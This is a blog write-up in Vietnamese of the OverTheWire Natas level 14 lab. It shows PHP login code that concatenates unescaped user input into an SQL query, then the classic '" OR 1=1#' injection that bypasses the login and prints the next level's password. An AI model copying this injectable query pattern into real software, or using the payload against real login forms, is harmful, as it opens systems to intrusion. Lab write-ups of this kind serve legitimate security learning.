[OverTheWire] Natas – Level 14

http://natas14.natas.labs.overthewire.org/

Nhấn View sourcecode:

<?
if(array_key_exists("username", $_REQUEST)) {
    $link = mysql_connect('localhost', 'natas14', '<censored>');
    mysql_select_db('natas14', $link);

    $query = "SELECT * from users where username="".$_REQUEST["username"]."" and password="".$_REQUEST["password"].""";
    if(array_key_exists("debug", $_GET)) {
        echo "Executing query: $query<br />";
    }

    if(mysql_num_rows(mysql_query($query, $link)) > 0) {
            echo "Successful login! The password for natas15 is <censored><br />";
    } else {
            echo "Access denied!<br />";
    }
    mysql_close($link);
} else {
?>

if(array_key_exists("username", $_REQUEST)) {

$link = mysql_connect('localhost', 'natas14', '<censored>');

mysql_select_db('natas14', $link);

$query = "SELECT * from users where username="".$_REQUEST["username"]."" and password="".$_REQUEST["password"].""";

if(array_key_exists("debug", $_GET)) {

echo "Executing query: $query<br />";

}

if(mysql_num_rows(mysql_query($query, $link)) > 0) {

echo "Successful login! The password for natas15 is <censored><br />";

} else {

echo "Access denied!<br />";

}

mysql_close($link);

} else {

Ta thấy ngay được là username và password đều không bị escape. Inject với câu lệnh được dạy trong sách giáo khoa:

username = " OR 1=1#
password = <gì cũng được>

Kết quả:

Successful login! The password for natas15 is AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J

→ flag = AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J.

Yêu CTF

CTF chưa bao giờ khiến tôi mệt mỏi…

[OverTheWire] Natas – Level 14

Leave a Reply Cancel reply